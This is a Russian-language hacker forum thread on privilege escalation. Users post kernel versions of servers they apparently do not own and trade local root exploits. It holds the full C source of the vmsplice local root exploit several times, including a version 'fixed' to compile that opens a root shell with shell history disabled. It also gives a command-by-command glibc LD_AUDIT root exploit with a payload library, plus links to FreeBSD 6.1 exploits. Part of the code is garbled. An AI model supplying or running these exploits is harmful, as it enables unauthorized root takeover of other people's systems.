повышение прав [задай вопрос - получи ответ]

Для ядер 2.6.х даты сборки до июля 2009 идеально подходит сборка enlightenment:
http://www.grsecurity.net/~spender/enlightenment.tgz

 

мм?

 

2.6.18 exploit

может кто подскажет почему ощибку дает:
2 сплоита
один на паблик выложен но умышленно не доделан:

Code:

/*
 
/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.18 - 2011
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include 
 
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
 
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
 
void exit_code();
char exit_stack[1024 * 1024];
 
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
 
#if defined (__i386__)
 
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
 
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
 
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
 
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
 
#elif defined (__x86_64__)
 
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
 
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
 
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
 
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
 
#else
#error "unsupported arch"
#endif
 
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
 
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
 
static uint uid, gid;
 
void kernel_code()
{
int i;
uint *p = get_current();
 
for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() { if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); } int main(int argc, char *argv[]) { int pi[2]; size_t map_size; char * map_addr; struct iovec iov; struct page * pages[5]; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); /*****/ pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; pages[1] = pages[0] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[0]); printf("[+] page: 0x%lx\n", pages[1]); pages[0]->flags = 1 << PG_compound; pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
 
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
 
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
 
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
 
pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
 
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
 
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
 
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
 
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);
 
/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
 
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
 
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}

второй нашел вроде как приват но на 2.6.18...х не катит,ошибку постоянно выдает.(на разных хостах пробовал: )
/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

 

vasykas, вот исправленный код первого сплойта с твоего сообщения:

Code:

/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.18 - 2011
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
//#include <asm/page.h>
#define PAGE_SIZE getpagesize()
#define __KERNEL__
#include <asm/unistd.h>

 
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
 
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
 
void exit_code();
char exit_stack[1024 * 1024];
 
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
 
#if defined (__i386__)
 
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
 
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
 
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
 
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
 
#elif defined (__x86_64__)
 
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
 
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
 
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
 
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
 
#else
#error "unsupported arch"
#endif
 
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
 
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
 
static uint uid, gid;
 
void kernel_code()
{
int i;
uint *p = get_current();
 
for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = 
p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() 
{ if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); } int main(int 
argc, char *argv[]) { int pi[2]; size_t map_size; char * map_addr; struct iovec iov; struct page * pages[5]; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); 
setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); 
printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); /*****/ pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; pages[1] = pages[0] + 1; map_size = 
PAGE_SIZE; map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); 
memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[0]); printf("[+] page: 0x%lx\n", 
pages[1]); pages[0]->flags = 1 << PG_compound; pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
 
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
 
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
 
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
 
pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
 
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
 
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
 
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
 
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);
 
/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
 
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
 
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}

 

скомпилился но не помогло

 

ты просил помочь с ошибками...ты же не думал, что рабочий приватный сплойт будет выложен в паблик с такой смешной недоработкой

 

будьте так любезны, подберите сплоит под

OS version: Linux version 2.6.32-3-amd64 (Debian 2.6.32-9) ([email protected]) (gcc version 4.3.4 (Debian 4.3.4-8) ) #1 SMP Wed Feb 24 18:07:42 UTC 2010
Distr name: Debian GNU/Linux 6.0

пробовал _1337day.com/exploits/14601
но не разобрался как с ним работать

пробовал r00t.sh (не запустился)
пробовал через libpcprofile.so нет прав на запись..

 

Судя по вашему сообщению через libpcprofile.so вы пробовали сделать выполнение крон...но данный дистрибутив должен пробиваться стандартным способом баги Glib...
вот перечень команд:

Code:

$ mkdir /tmp/exploit

$ ln /bin/ping /tmp/exploit/target

$ exec 3< /tmp/exploit/target

$ rm -rf /tmp/exploit/

$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D

$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

 

к сожалению такой метод не прошел.
запрещены хард-линки
ОС установленна в отдельный сектор, где не нашел ни единой папки с правами на запись.

посмотрите что-нибудь еще пожалуйста.

 

ну прав на запись там и не должно нигде быть..в том методе, права на запись нужны только в папке tmp...а там они всегда есть...
пройбуй роберт ю сак, фулл нельсон.

 

это не поможет?
http://turboupload.com/n0f9pp2a1udn

 

vasykas, спасибо
помог сплоит ia32syscall emulation

 

Code:

Linux ****** 2.6.32.38-bitrix10 #1 SMP Fri Apr 22 04:08:18 MSD 2011 x86_64

Подскажите сплойт.

 

exmicru, имхо не найдешь, слишком свежий.

Уважаемые постояльцы, подскажите что-нибудь для
Linux version 2.6.27.5-117.fc10.x86_64 ([email protected]) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 SMP Tue Nov 18 11:58:53 EST 2008

p.s. при компилировании чего-либо ругается на инклуды /usr/include/string.h:39: error: expected declaration specifiers or '...' before 'size_t' и т.д.
может кто подскажет возможно рабочий вариант, тогда буду эксперементировать уже с библиотеками.

 

Enlightenment, Glib

 

Подскажите, что можно тут попробовать?

FreeBSD ****** 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Thu Oct 26 14:44:23 PDT 2006

 

http://www.securitylab.ru/poc/275399.php
http://www.exploit-db.com/exploits/9488/
http://security-sh3ll.blogspot.com/2009/08/freebsd-61-local-root-vulnerability.html
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1302-freebsd-6-1-local-root-vulnerability-0-day.html
че нибудь здесь посмотри

 

Не один из них так и не скомпилился.. Ошибки валятся.. Могу привести их сюда, если необходимо..

 

давай

 

http://forum.intern0t.net/exploits-vulnerabilities-pocs/1302-freebsd-6-1-local-root-vulnerability-0-day.html
###########################
1.c: In function `main':
1.c:73: warning: assignment from incompatible pointer type
1.c:83: warning: passing arg 3 of `pthread_create' from incompatible pointer type
1.c:84: warning: passing arg 3 of `pthread_create' from incompatible pointer type
1.c:107:2: warning: no newline at end of file
/var/tmp//ccvijMZ6.o(.text+0x1ee): In function `main':
: undefined reference to `pthread_create'
/var/tmp//ccvijMZ6.o(.text+0x203): In function `main':
: undefined reference to `pthread_create'
###########################

http://www.exploit-db.com/exploits/9488/
############################
/var/tmp//ccOFVRly.o(.text+0x1dd): In function `main':
: undefined reference to `pthread_create'
/var/tmp//ccOFVRly.o(.text+0x1f2): In function `main':
: undefined reference to `pthread_create'
############################

По одному из линков вообще ДоС..

з.ы. Не ругаться, я в Си подобных языках вообще ноль.